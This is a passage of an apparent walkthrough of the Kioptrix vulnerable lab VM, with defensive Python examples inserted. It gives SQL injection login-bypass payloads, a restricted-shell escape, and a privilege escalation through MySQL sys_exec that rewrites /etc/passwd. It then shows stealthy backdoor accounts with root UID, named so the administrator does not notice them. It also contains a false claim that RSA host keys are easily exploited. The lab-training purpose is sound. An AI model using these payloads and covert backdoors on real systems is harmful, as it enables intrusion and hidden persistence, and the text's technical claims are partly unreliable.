"Kioptrix is an extremely vulnerable Virtual Machine image. The object of the game is to acquire root access via any means possible. The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges." - Kioptrix authors.

Kioptrix is an operating system in the form of a Virtual Machine that has many security holes. The purpose of creating this operating system is to provide a basic understanding of, and training in, the methodology and process of carrying out a security penetration. There are so many ways to obtain root access on this system that the Kioptrix operating system is well suited as learning material for getting to know the world of computer security.

Actually, there are many ways to gain root access to the Kioptrix server. In this book, we discuss some very simple techniques to gain such access. Those techniques are:

1. SQL Injection.

The Kioptrix web server has an SQL Injection weakness. An SQL Injection attack consists of a series of steps that enter SQL queries by exploiting weaknesses in the data input form. When an SQL Injection attack succeeds, an attacker gains access to the database (such as reading, adding, modifying, and deleting data), can execute operational commands on the database (such as shutting down the DBMS service), and can then try to obtain root access on the system. This technique takes advantage of weak input validation on the web. One input used for the experiment is the single quote (').

The consequences of the SQL Injection weakness are as follows:

a. Attackers gain access to read and modify the database.

b. Attackers gain access to execute operational commands on the database.

c. Attackers may gain access as root on the server system.

The use of this technique requires basic knowledge of HTTP and databases.

a. HTTP.

Hypertext Transfer Protocol (HTTP) is a protocol that is very widely used on the Internet. Every Web browser (e.g. Internet Explorer, Mozilla Firefox, and Google Chrome) and Web server (such as those of Google, Wikipedia, and Facebook) communicates through this protocol to exchange information.

b. Web server.

A Web server or Web site is a server that serves all client requests made through a Web browser. The client's request is processed, and the result is sent back to the client and displayed by the client's Web browser.

c. Database.

The center of the Web server is a database. A database is the data storage medium of a site. The data can be customer data, web content data, system entry data, etc.


2. Modify /etc/passwd.

All Kioptrix account information is stored on the server in the configuration file /etc/passwd. Therefore, we will modify this file to be able to manipulate the user access rights we want.

The use of this technique requires basic knowledge of file access and user settings on Linux.

a. Setting file access on Linux.

On Linux, the access mode of a file can be set via the chmod command. Each file on Linux has a mode value, which may differ from one file to another. To see the mode value of each file, we can give the command ls -l.

If we want to see the mode of the file /etc/passwd on Kioptrix, we type the command ls -l /etc/passwd in the Linux terminal, as shown below.

The result of the command is the following.

b. Setting user access on Linux.

On Linux, the access settings of a user are stored in the file /etc/passwd. Let us look at this line carefully. This is the line for the root user's settings on the Kioptrix system.
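An added check that covers both sub-points above (it is example code written for this explanation, not code from the book or from Kioptrix): it converts the mode column of ls -l output into the numeric permission bits chmod uses and flags a group- or world-writable /etc/passwd, then audits /etc/passwd lines for UID 0 accounts other than root and for empty password fields. The ls -l lines and the accounts are constructed samples, not the Kioptrix screenshot.

```python
import stat
from typing import Dict, List

# Constructed sample output of `ls -l /etc/passwd` (assumed for illustration,
# not the Kioptrix screenshot): a normal mode and a weakened one.
LS_LINE_NORMAL = "-rw-r--r-- 1 root root 1023 Jan  2  2017 /etc/passwd"
LS_LINE_WEAK = "-rw-rw-rw- 1 root root 1023 Jan  2  2017 /etc/passwd"

# Constructed /etc/passwd content with hypothetical accounts (not the book's).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
john:x:1000:1000:John:/home/john:/bin/bash
robert::1001:1001:Robert:/home/robert:/bin/bash
toor:x:0:0:extra superuser:/root:/bin/bash
"""


def mode_string_to_octal(mode: str) -> int:
    """Convert the ten-character mode column of `ls -l` (e.g. -rw-r--r--)
    into the numeric permission bits that chmod uses (0o644).
    Only the nine rwx bits are returned; 's'/'t' count as the x bit set."""
    if len(mode) != 10:
        raise ValueError("expected a 10-character mode such as -rw-r--r--")
    value = 0
    for i, ch in enumerate(mode[1:]):
        if ch not in "-rwxsStT":
            raise ValueError("unexpected permission character %r" % ch)
        if ch in "rwxst":            # upper-case S/T mean the x bit is clear
            value |= 1 << (8 - i)
    return value


def writable_by_others(ls_line: str) -> bool:
    """True when the file described by an `ls -l` line can be written by its
    group or by everyone. For /etc/passwd that means an ordinary local user
    can add or alter accounts, which is what makes modifying the file from a
    low-privileged account possible."""
    mode = ls_line.split()[0]
    return bool(mode_string_to_octal(mode) & (stat.S_IWGRP | stat.S_IWOTH))


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Split /etc/passwd into its seven colon-separated fields per line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d"
                             % (lineno, len(fields)))
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "password": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home,
                        "shell": shell})
    return entries


def audit_passwd(text: str) -> List[str]:
    """Report the classic signs that /etc/passwd has been tampered with."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == 0 and e["name"] != "root":
            findings.append("%s: UID 0 account other than root" % e["name"])
        if e["password"] == "":
            findings.append("%s: empty password field, login needs no password"
                            % e["name"])
        elif e["password"] not in ("x", "*") and not e["password"].startswith("!"):
            findings.append("%s: password hash kept in /etc/passwd instead of "
                            "/etc/shadow (readable by every user)" % e["name"])
    return findings


if __name__ == "__main__":
    print("normal /etc/passwd writable by others:", writable_by_others(LS_LINE_NORMAL))
    print("weak   /etc/passwd writable by others:", writable_by_others(LS_LINE_WEAK))
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("finding:", finding)
```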

1.5. Conclusion

Ethical hacking is more than just running hacking tools and gaining unauthorized access to a system just to see what can be accessed on it. When performed by a security professional, ethical hacking should also include all aspects of structured surveillance and information gathering, and the ability to approach and analyze the attacks carried out. Ethical hacking requires thorough knowledge of systems and hacking tools, and also requires a lot of patience and the ability to refrain from deliberate destruction. Basically, hacking can be done ethically, and the reality today is that ethical hacking is being supported and shaped by several government agencies and the private sector to ensure that systems are secure.


CHAPTER 2:

SET-UP HACKING LAB

2.1. Preliminary

Every Ethical Hacker must have a special place to practice and learn. Most beginners are a bit confused about how to learn hacking without running into the law. That is why we need to create a private lab for hacking. The lab must be set up under closed (isolated) conditions, so the attacks we are studying will not harm unintended targets. Basically, the lab is there to avoid the things we do not want.

In this lab, you will be free to experiment and simulate while studying hacking. In general, the lab must have at least two machines, namely the attacker's machine and the target machine; in other words, the minimal components of the lab are the attacker and the victim. Penetration testing activity can cause very damaging effects, because most of the tools and exploits we will use have the potential to cause harm or can even leave the target system dead. In most cases it is easier to reinstall a system than to repair it. That makes virtualization applications a very suitable choice when building a private lab.

In the experiments used in this book, the attacker's machine we use is the Backtrack 5 R3 operating system, while the target machine we use is the Kioptrix Server Level 1.3 (Hyper-V) operating system.

2.2. Preparation Software

First, download a virtualization application. A virtualization application is an application that allows a computer to run one or more operating systems without a reboot. With a virtualization application, we can run many operating systems simultaneously without rebooting. There are many examples of virtualization applications, one of which is VMWare Virtual Machine. In this experiment, the virtualization application used is VMWare Virtual Machine v. 9.0. VMWare is used to run the Backtrack 5 R3 operating system (as the attacker's operating system) and the Kioptrix Server operating system (as the victim's operating system).

VMWare Virtual Machine v. 9.0, used in the experiments in this book, can be downloaded from the page https://my.vmware.com/web/vmware/downloads. Also, please remember to download Backtrack and Kioptrix Server as ISO files.


2.3. Install a Guest Operating System Manually

Installing a guest operating system in a virtual machine is similar to installing an operating system on a physical computer. If you do not use Easy Install when you create a virtual machine in the New Virtual Machine wizard, you must install the guest operating system manually.

You can install a guest operating system from an installer disc or ISO image file. You can also use a PXE server to install the guest operating system over a network connection. If the host configuration does not permit the virtual machine to boot from an installer disc, you can create an ISO image file from the installer disc.

Prerequisites

a. Verify that the operating system is supported. See the online VMware Compatibility Guide on the VMware Web site.

b. See the VMware Guest Operating System Installation Guide for information on the guest operating system that you are installing.

Procedure

1. If you are installing the guest operating system from an installer disc, configure the virtual machine to use a physical CD-ROM or DVD drive and configure the drive to connect at power on.

a. Select the virtual machine and select VM > Settings.

b. On the Hardware tab, select CD/DVD drive.

c. Select Connect at power on.

d. (Remote virtual machine only) Select the location of the CD-ROM or DVD drive.

e. Select Use physical drive and select the drive.

f. Click OK to save your changes.

2. If you are installing the guest operating system from an ISO image file, configure the CD/DVD drive in the virtual machine to point to the ISO image file and configure the drive to connect at power on.

a. Select the virtual machine and select VM > Settings.

b. On the Hardware tab, select CD/DVD drive.

c. Select Connect at power on.

d. (Remote virtual machine only) Select the location of the ISO image file.

e. Select Use ISO image file and browse to the location of the ISO image file.

f. Click OK to save your changes.

3. If you are installing the guest operating system from an installer disc, insert the disc in the CD-ROM or DVD drive.

4. Power on the virtual machine.

5. Follow the installation instructions provided by the operating system vendor.

6. If the operating system consists of multiple installer discs and you are prompted to insert the next disc, insert the next disc in the physical drive.

7. If the operating system consists of multiple ISO image files, select the image file for the next CD.

a. Select VM > Removable Devices > CD/DVD > Disconnect and disconnect from the current ISO image file.


b. Select VM > Removable Devices > CD/DVD > Settings and select the next ISO image file.

c. Select Connected and click OK.

8. Use the standard tools in the operating system to configure its settings.


CHAPTER 3:

RECONNAISSANCE, SCANNING & ENUMERATION

The initial step of the hacking process is collecting information about the target. The collection of information, also known as footprinting, is the process of gathering all the information related to a target organization. Now, with the Internet, that information can be collected easily from a variety of sources. A hacker uses information gathering to determine the most promising targets, which is why the collection of information becomes very valuable. Collecting information not only helps identify where potential targets are located, but also helps determine how best to gain access to the target. The collected information can then be used to identify targets so that hackers gain access to the target.

Social engineering can also be used to obtain more information about the organization, which in turn may lead to quite serious attacks. Social engineering can be used as a very effective information-gathering tool, because these attacks take advantage of the most vulnerable asset in an organization: the carelessness of people within the organization. Human interaction and the desire to be helpful make careless insiders a way to gather the information we want. Good social engineering techniques can speed up the hacking process and in most cases will yield more information easily and quickly.

In this chapter, we will look at how to collect information as the first step in hacking against our target system.

3.1. Preparing Backtrack

On Backtrack, we check the connection by checking the network configuration; here are the steps:

1. Open a Backtrack terminal

2. Type ifconfig

The result is below:

In the picture, we can see that the IP address of Backtrack is 192.168.36.163

3.2. Find and locate the target system

Find and map all hosts connected to the same network as our Backtrack machine; here are the steps:

1. Open a Backtrack terminal

2. Type netdiscover -i eth3 -r 192.168.36.163, as in the picture below:

Wait until the search process is finished.

Description: the netdiscover tool was chosen because it can locate and map all hosts on the same network as Backtrack. The option -i eth3 was chosen because the active network interface on Backtrack is eth3. The option -r 192.168.36.163 tells it to look for any host that can be reached from Backtrack's own IP address.

Here are the search results when completed:

From the picture above, we can conclude that the number of hosts reachable from Backtrack is three. Because 192.168.36.2 and 192.168.36.254 are IP addresses created solely by the Virtual Machine application, it can be ascertained that the target server's IP address is 192.168.36.209.

3.3. Information about the target server

The provisional information we have about the target server is that its IP address is 192.168.36.209. Here is the view of the target server:

CHAPTER 4:

SERVICE DETECTION

4.1. Figuring out the service list using nmap

To find out the list of services running on the target server, we can use nmap; here are the steps:

1. Open a Backtrack terminal

2. Type nmap -A -sS -PN 192.168.36.209

The result is the following:

4.2. The conclusions of service detection

Here are the conclusions of the service detection.

1. For the ssh service (port 22)

Conclusion:

a. The default user for ssh is the user root.

b. The key fingerprint for this server is of RSA type. Based on http://en.wikipedia.org/wiki/RSA_problem, the RSA key fingerprint can be exploited easily.

2. For the http service (port 80)

Conclusion:

This web server does not support HTTPS.

CHAPTER 5:

VULNERABILITY ASSESSMENT

5.1. Vulnerability Assessment using Mozilla Firefox

Because port 80 is open, it makes sense to try to find security holes in the HTTP service (port 80). Here are the steps:

1. Open the Mozilla Firefox browser

2. Type in the address bar: 192.168.36.209 (the target IP address)

3. Try to log in with this account information:

- Username : admin

- Password : admin

4. Click Login.

5. Because the username and password are wrong, this picture appears:

From the picture above, we can conclude that:

1. The method used by the application is the POST method.

2. The username input is stored in the variable "myusername".

3. The password input is stored in the variable "mypassword".

4. All user input is sent to the file checklogin.php

6. Now, we try again to log in with the information shown below:

- Username : admin

- Password : '

7. As it turned out, the server gives the following error message:


Oops... It turns out that the server is vulnerable to SQL Injection.

8. Now, we try again to log in with the information shown below:

- Username : '

- Password : admin

9. As it turned out, the server gives the following error message:

From the trial and error above, we can conclude that the username input cannot be exploited using SQL Injection. However, the good news is that the password input can be exploited using SQL Injection. So whereas we previously needed to know both a valid username and a valid password in order to log in, now we only need to know a valid username, and we do not need to know a valid password.
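The login check behind this test, and behind the SQL Injection overview in Section 1.4, as an added example written for this explanation (it is not the book's code and not Kioptrix's checklogin.php): the same username/password query built the vulnerable way by string concatenation and the safe way with a parameterised query, plus the single-quote probe from step 6 run against both. The in-memory SQLite table, its name, the two accounts and the plaintext password column are assumptions made for the illustration.

```python
import sqlite3
from typing import Callable


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's member table (assumed schema and
    accounts; a real application must store password hashes, not plaintext)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, "
                 "username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO members (username, password) VALUES (?, ?)",
                     [("john", "j0hn-demo-pass"), ("robert", "r0bert-demo-pass")])
    conn.commit()
    return conn


def checklogin_vulnerable(conn: sqlite3.Connection,
                          myusername: str, mypassword: str) -> bool:
    """The flawed pattern: the form values are glued into the SQL text, so a
    quote typed by the user ends the string literal and becomes SQL syntax.
    That is why a lone ' produced a database error message on the login page."""
    sql = ("SELECT id FROM members WHERE username='" + myusername +
           "' AND password='" + mypassword + "'")
    return conn.execute(sql).fetchone() is not None


def checklogin_fixed(conn: sqlite3.Connection,
                     myusername: str, mypassword: str) -> bool:
    """The fix: a parameterised query. The SQL text is constant and the values
    travel separately, so a quote in either field is compared as plain data."""
    sql = "SELECT id FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (myusername, mypassword)).fetchone() is not None


def quote_probe(login: Callable[[sqlite3.Connection, str, str], bool],
                conn: sqlite3.Connection, username: str) -> str:
    """Repeat the book's manual test from the defender's side: submit a lone
    single quote as the password. A database syntax error is the tell-tale
    sign of the weakness; a hardened check simply denies the login."""
    try:
        return "granted" if login(conn, username, "'") else "denied"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for name, login in (("vulnerable", checklogin_vulnerable),
                        ("fixed", checklogin_fixed)):
        print(name, "with a valid account:", login(db, "john", "j0hn-demo-pass"))
        print(name, "with password ':", quote_probe(login, db, "admin"))
```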


5.2. Vulnerability Assessment using OWASP DirBuster

To find information about valid users of the system, we can use tools known as fuzzers. Fuzzers are tools that can guess and draw up a list of the directory structure of a target server. Because the server runs a web application, we must use a fuzzer that has web application fuzzing features, one of which is OWASP DirBuster. Here are the steps for using OWASP DirBuster:

1. Click Applications in the taskbar.

2. Highlight BackTrack

3. Highlight Vulnerability Assessment

4. Highlight Web Application Assessment

5. Highlight Web Application Fuzzers

6. Click dirbuster

7. Here is the view of OWASP DirBuster:

8. Set the configuration of OWASP DirBuster with the following information (as described in the picture below):

Information:

- Target URL: http://192.168.36.209:80/

The Target URL is the URL to be brute-forced using the fuzzer, in this case the Kioptrix4 server.

- Work Method: Auto Switch (HEAD and GET)

The Work Method is the type of request method to use; in this case we use Auto only.

- Number of Threads: 10 Threads

The Number of Threads is how many threads will be used during the work. The more threads we give it, the faster the work proceeds, but it will cause Backtrack to slow down noticeably.

- Select scanning type: Pure Brute Force

Select scanning type is the kind of search to be done, whether based on a prepared list (dictionary-based brute force) or actual brute force (pure brute force).

9. Then click the Start button; the search process will start soon.


10. The following is the report given:

From the results above, we can conclude that there are two names of people, namely john and robert. Most likely they are valid users on the web server.

11. In order to prove whether they are valid users or not, we re-open the Mozilla Firefox browser and access http://192.168.36.209:80/john; the results are as follows:


12. Now click the file john.php. Instead of the file, we are redirected to the front page of the site, http://192.168.36.209.

So when we access http://192.168.36.209/john/john.php without being logged in, we are immediately sent back to http://192.168.36.209 and forced to log in first.

To test whether the user robert is valid on the server, we use the same steps as for john. Accessing http://192.168.36.209/robert/robert.php likewise sends us straight back to http://192.168.36.209 and forces us to log in first.

From these experiments we conclude that the web application has two users, john and robert. The problem is that we do not know their passwords, so we cannot log in. Fortunately, the password field of the web application's login form turns out to be vulnerable to SQL injection, so knowing a valid username is enough to log in.

CHAPTER 6:
EXPLOITATION
6.1.

Exploitation using SQL Inject Me

There are many tools that can exploit SQL injection flaws; one of them is SQL Inject Me, a browser add-on bundled with OWASP Mantra in BackTrack. Here are the steps for using SQL Inject Me:

1. Open a terminal in BackTrack.

2. Type cd /pentest/web/mantra

3. Type ./mantra

4. A browser opens with the display shown in the original figure.

5. Press the F10 key to display the menu bar.

6. Click the Tools menu.

7. Highlight Application Auditing.

8. Highlight SQL Inject Me.

9. Click Open SQL Inject Me Sidebar (the original figure shows the menu path).

10. A sidebar appears as shown in the original figure.


11. Fill in the information SQL Inject Me asks for:

- In the myusername field, type john.

- Tick the checkbox next to mypassword, so that this is the field the add-on injects its test values into.

- In the drop-down list next to the Execute button, choose Run all tests.

12. Click the Execute button and wait for the tests to finish.


13. The following is the report when the process has completed (original figure), together with its detailed report.

Conclusion:

- Of the 14,620 tests, three produced responses that indicate a possible injection flaw.

- The three test values were:

o Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31

o Tested value: ' OR username IS NOT NULL OR username = '

o Tested value: 1' OR '1'='1

All three can potentially cause SQL injection through the password input, the mypassword variable. Note that the first value is simply the URL-encoded form of the third (1' OR '1'='1).


14. Now we try to log in using these values.

TRIAL 1

Log in with the following information:

- Username: john

- Password: %31%27%20%4F%52%20%27%31%27%3D%27%31

The result is an ordinary login failure: this value does not exploit the server. Typed into the form field, the percent sequences are submitted as literal text (the browser encodes each % again), so the application compares the password with the string %31%27... itself, not with the decoded 1' OR '1'='1.

TRIAL 2

Log in with the following information:

- Username: john

- Password: ' OR username IS NOT NULL OR username = '

The result: the system treats us as logged in as john, even without a password.

TRIAL 3

Log in with the following information:

- Username: john

- Password: 1' OR '1'='1

The result: just as in the second trial, the system treats us as logged in as john with valid credentials.

TRIAL 4

The fourth trial is the last login attempt as john. The member page shown after the successful injections in trials 2 and 3 displays the account's real password, so now we log in with:

- Username: john

- Password: MyNameIsJohn

The result: a normal login succeeds, so the valid account for john is:

- Username: john

- Password: MyNameIsJohn


This experiment tries to log in as the user robert.

TRIAL 1

Log in with the following information:

- Username: robert

- Password: %31%27%20%4F%52%20%27%31%27%3D%27%31

The result is an ordinary login failure: as with john, the URL-encoded value does not exploit the server.

TRIAL 2

Log in with the following information:

- Username: robert

- Password: ' OR username IS NOT NULL OR username = '

The result: the system treats us as logged in as robert, even without a password.

TRIAL 3

Log in with the following information:

- Username: robert

- Password: 1' OR '1'='1

The result: just as in the second trial, the system treats us as logged in as robert with valid credentials.

TRIAL 4

The fourth trial is the last login attempt as robert. Based on the member page shown in trials 2 and 3, we log in with:

- Username: robert

- Password: ADGAdsafdfwt4gadfga==

The result: a normal login succeeds, so the valid account for robert is:

- Username: robert

- Password: ADGAdsafdfwt4gadfga==
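To see why two of the three flagged values log in and the first one does not, here is an added example (mine, not code from the book or from checklogin.php on the server) that models the login check with an in-memory SQLite table. The members table, its two rows and the exact text of the query are assumptions chosen to reproduce what the trials above showed; the string-built query is placed next to a parameterised one, which is the fix.

```python
"""Offline model of the login check exploited in this chapter: checklogin.php
compares the myusername/mypassword fields against a members table. Added
example, not the book's or the server's code; the table, its rows and the
query text are assumptions that reproduce the behaviour the book observed."""
import sqlite3
import urllib.parse

# Constructed members table; the passwords are the ones the book recovers.
CONSTRUCTED_MEMBERS = [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")]

# The three values SQL Inject Me flagged for the mypassword field.
TESTED_VALUES = [
    "%31%27%20%4F%52%20%27%31%27%3D%27%31",       # trial 1
    "' OR username IS NOT NULL OR username = '",   # trial 2
    "1' OR '1'='1",                                 # trial 3
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", CONSTRUCTED_MEMBERS)
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation (assumed shape of checklogin.php's
    query): the user's input is parsed as SQL. Returns the usernames of the
    matched rows; an empty list means the login is refused."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, username, password):
    """Parameterised version: the same inputs are compared as plain strings."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def decoded_trial_1():
    """Trial 1 is trial 3 percent-encoded. Typed into the form, the browser
    re-encodes the % signs, so the server compares against the literal
    %31%27... text and the login fails; only the decoded text injects."""
    return urllib.parse.unquote(TESTED_VALUES[0])


def run_trials():
    """{value: (rows matched by the vulnerable query, rows matched by the safe query)}"""
    conn = make_db()
    results = {}
    for value in TESTED_VALUES + ["MyNameIsJohn"]:
        results[value] = (login_vulnerable(conn, "john", value),
                          login_safe(conn, "john", value))
    return results


if __name__ == "__main__":
    for value, (vuln, safe) in run_trials().items():
        print("%-45r vulnerable=%s safe=%s" % (value, vuln, safe))
```

Trials 2 and 3 turn the WHERE clause into (username='john' AND password='') OR <always true>, so every row matches and the application accepts the login; the parameterised query matches nothing for those values and only the real password for john. Trial 1 only "works" once the value is decoded, which the form never does.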

6.2.

Exploitation using SSH

Because we now hold two valid accounts, and because the ssh service (port 22) is open, it is worth trying to log in over ssh. Here are the steps:

1. Open a terminal in BackTrack.

2. Type ssh john@192.168.36.209

3. Enter the password MyNameIsJohn

4. The screen shown in the original figure appears.

Congratulations: we can log in to the system over ssh as john.

Additional:

We can also log in over ssh as robert:

1. Open a terminal in BackTrack.

2. Type ssh robert@192.168.36.209

3. Enter the password ADGAdsafdfwt4gadfga==

4. The screen shown in the original figure appears.

5. We are logged in, but this user has limited access rights: the login shell is a restricted shell that allows only a few commands.


To see which commands the restricted shell allows, simply type ? or help, as shown in the original figure.

Apart from those eight (8) commands, the shell refuses every other command. For example, typing passwd, whoami or pwd produces the message shown in the figure.

Now let us try to move to the top directory (/) with cd /; the shell answers with the error message shown in the figure.

This is bad: moving to the top of the directory tree is treated as a forbidden command, and the shell warns that it will not warn again if another forbidden command is entered.

The moment we type another forbidden command (here cd / once more), the shell immediately disconnects the user from the system.

CHAPTER 7:
GAINING ACCESS
7.1.

Break from limited shell

The users john and robert are registered as regular users and are confined to a restricted shell, so they can run only a few commands.

One way out of the restriction is to type the command

echo os.system('/bin/bash')

in the restricted shell of the logged-in user (in this example john), as shown in the original figure.

Hooray, john is no longer confined to the restricted shell, and can now execute any command on the server.

The table in the original figure compares the commands id, uname -a and whoami as run by the user who escaped the restricted shell (john) and by the user still inside it (robert).


7.2.

Looking for processes run by root

To become root, we must find which processes run with root privileges. In john's ssh session, type ps aux | grep root; the result is shown in the original figure.

Let us focus on the part marked in the figure: three lines, each a command executed with root privileges:

1. /bin/sh /usr/bin/mysqld_safe

2. /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.

3. logger -p daemon.err -t mysqld_safe -i -t mysqld

From these three commands we conclude that the mysqld service is running with root privileges (note the explicit --user=root).


7.3.
Taking over the mysqld account

Because mysqld runs with root privileges, any operating system command we can make mysqld execute will also run as root.

Earlier we learned that every login submitted to the web application is processed by the file checklogin.php, so we need to look at its contents. In john's terminal, type

cat /var/www/checklogin.php

and the contents appear as in the original figure.

Focus on the two marked lines: the account the application uses to connect to mysqld is

- Username: root

- Password: (empty)

Oops, the password is blank.


7.4.

Login as the mysqld service account

As we saw earlier, mysqld runs with root privileges, so every operating system command mysqld executes is run by the system as root. Here are the steps to log in to the database with the service account:

1. In john's terminal, type mysql -u root -h localhost, as shown in the figure.

2. We are logged in without being asked for a password, because the account has no password.

3. To see what the current database user (root) is allowed to do, enter: show grants

From the output we conclude that we hold all privileges as root on this server (localhost). Note that this is the database's own root account, not the operating system's; it becomes useful because the mysqld process itself runs as the operating system root.


7.5.

Modify the file /etc/passwd

All account information on the server is stored in the configuration file /etc/passwd, so we will try to modify that file. Here are the steps:

1. In the terminal type the command: ls -l /etc/passwd

2. The output of the command is shown in the original figure.

Conclusion:

- The file is owned by the user root, who has permission to read and write it.

- Members of the group root may only read it.

- Everyone else, apart from the user root and the group root, may only read it.

So the file's permission mode is 644, meaning:

- 6 => (r)ead = 4 + (w)rite = 2, for the owner root

- 4 => (r)ead = 4, for the group root

- 4 => (r)ead = 4, for everyone except the user root and the group root

3. Type the command cat /etc/passwd

4. Look closely at these lines. The first is the line for the root user, the other two are the lines for john and robert:

- root : x : 0 : 0 : root : /root : /bin/bash

- john : x : 1001 : 1001 : ,,, : /home/john : /bin/kshell

- robert : x : 1002 : 1002 : ,,, : /home/robert : /bin/kshell

(1) : (2) : (3) : (4) : (5) : (6) : (7)

Information:

(1) the name of the user registered on the system

(2) the password field; x means the password hash is stored in /etc/shadow

(3) the numeric user ID (UID)

(4) the numeric group ID (GID)

(5) additional information about the user (GECOS)

(6) the location of the user's home directory

(7) the login shell

Comparing the three lines, what makes root special and different from john and robert are fields (3), (4) and (7). Therefore we will try to give john the same values as root. The problem is that only the root user has the right to write the file. How can john be made able to write it?

Do not forget: we control the mysqld service account, and the mysqld process runs as root, so it can run commands with root privileges. We can therefore instruct mysqld to change the permissions of this configuration file so that john can write it.

5. Log in to mysqld and type the following command:

select sys_exec("chmod 777 /etc/passwd");

This sets the permission mode of /etc/passwd to 777. sys_exec is not a built-in MySQL function: it comes from the lib_mysqludf_sys user-defined function library, which is already loaded into mysqld on this server. On a server where it is not loaded, the call fails with an error saying the function does not exist, and this route does not work.


The result is shown in the figure. Success: the file's permission mode is now 777.

6. Leave the mysql client (type exit) and, back in john's shell, type ls -l /etc/passwd. The result shows that every user on the system (including john) now has full permissions on the file.

7. Type the command vim /etc/passwd to edit the file, and change the line

john:x:1001:1001:,,,:/home/john:/bin/kshell

into

john:x:0:0:,,,:/home/john:/bin/bash

8. Then, in john's ssh window, type whoami. The result is still john.

9. Then, in john's ssh window, type the command id.

10. The system still does not treat john as root: a running session keeps the UID it was given at login, and the edited /etc/passwd is only consulted when a new session is opened. So we must first log out of john's ssh session.

To leave the unrestricted bash, type exit; john is then back in the restricted shell, and to close the ssh window type exit once more.

11. After closing the ssh connection, open a new one.

12. Log in with the username john and the password MyNameIsJoh. The result is shown in the figure.

Voilà, we are logged in as root. To prove it, type whoami and id: both report root (uid=0).

Now there are two accounts with root's UID on this server, the user root itself and the user john. In other words, john is now equivalent to root and has full rights over the system.


7.6.

Proof that we are root

Because this server is designed as learning material for beginners (like me) who want to deepen their knowledge of system security, its developers prepared a 'testament message' for the attacker who manages to become root. To read it, simply type the command:

cat /root/congrats.txt

CHAPTER 8:
BACK DOOR
8.1.

Make a regular user as a back door

Because we do not want the real root user to become suspicious of john, who now has root privileges, we will create a new user with the access rights of a normal user (equivalent to robert). The regular user we create must not arouse suspicion, so we will create the user alex: the root user will assume alex is a legitimate LigGoat employee.

Steps to create the new user:

1. In the ssh window as root, type useradd alex. This creates a user named alex without setting a password, as shown in the figure.

2. To confirm that alex was created, simply type cat /etc/passwd; the result is shown in the figure.

3. The user alex exists, but its login shell is /bin/sh. A user with the same access level as john and robert should have /bin/kshell as login shell. So we edit the file and change alex's shell by typing vim /etc/passwd.

Picture: alex's line, before and after changing the shell to /bin/kshell.

4. Now alex is confined to the restricted shell, so the root user will not be suspicious of the user we have just created.

Evidence that alex is in the restricted shell is shown in the figure.


8.2.
Creating a user with root access as a back door

In fact, adding the ordinary user alex is enough for us to regain root access. But as a precaution, in case alex is discovered and removed, we need a backup route through the back door.

The figure shows what happens when alex tries to obtain root permissions. From it we conclude:

- alex can break out of the restricted shell.

- alex cannot switch user to root, because we do not know the root password.

- alex can switch user to john (who has root-equivalent rights), because we know john's password.

The root-equivalent user we create must also not arouse suspicion. We will create the user syskioptrix, because the root user will assume it is a service account used for storing log files on the server.

Steps to create the new user:

1. In the ssh window as root, type useradd syskioptrix. This creates a user named syskioptrix without setting a password, as shown in the figure.

2. To confirm that syskioptrix was created, simply type cat /etc/passwd; the result is shown in the figure.

3. The user syskioptrix exists, but its login shell is /bin/sh; a user with root-level access should have /bin/bash. So we edit /etc/passwd with vim, change the shell, and give the line the same UID and GID as root (0 and 0), as was done for john in 7.5. To make syskioptrix harder for the root user to notice, we also move its line to the second line of the file, directly below root's.

Picture: the syskioptrix line, before and after the change.

4. Congratulations: syskioptrix now logs in as root.

Supplement: alex and syskioptrix were deliberately given no password, so as not to arouse the root user's suspicion and to make logging back in without authentication easier. Note, however, that useradd without -p does not leave the password field empty: it writes a locked field ("!") to /etc/shadow, so these accounts cannot log in over ssh with a password until one is set with passwd or the field is cleared, and sshd also refuses empty passwords unless PermitEmptyPasswords is enabled. A UID-0 account that needs no password is also exactly what an administrator's audit of /etc/passwd and /etc/shadow looks for.
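An administrator checking the machine after chapters 7 and 8 would look for exactly the changes made there: extra UID-0 entries (john in 7.5, syskioptrix here), a world-writable /etc/passwd, employee accounts whose shell is not the restricted one, and accounts that need no password. The following added example (mine, not the book's code) performs those checks; the /etc/passwd and /etc/shadow contents are constructed to mirror the state the book leaves behind, and the function names are my own.

```python
"""Administrator-side audit for the account changes made in 7.5 and chapter 8.
Added example, not the book's code; the /etc/passwd and /etc/shadow contents
below are constructed to mirror the state the book leaves behind."""
import stat

# Constructed /etc/passwd after chapter 8, with syskioptrix hidden under root.
CONSTRUCTED_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
syskioptrix:x:0:0::/home/syskioptrix:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
alex:x:1003:1003::/home/alex:/bin/kshell
"""

# Constructed /etc/shadow: "!" is the locked field useradd writes when no
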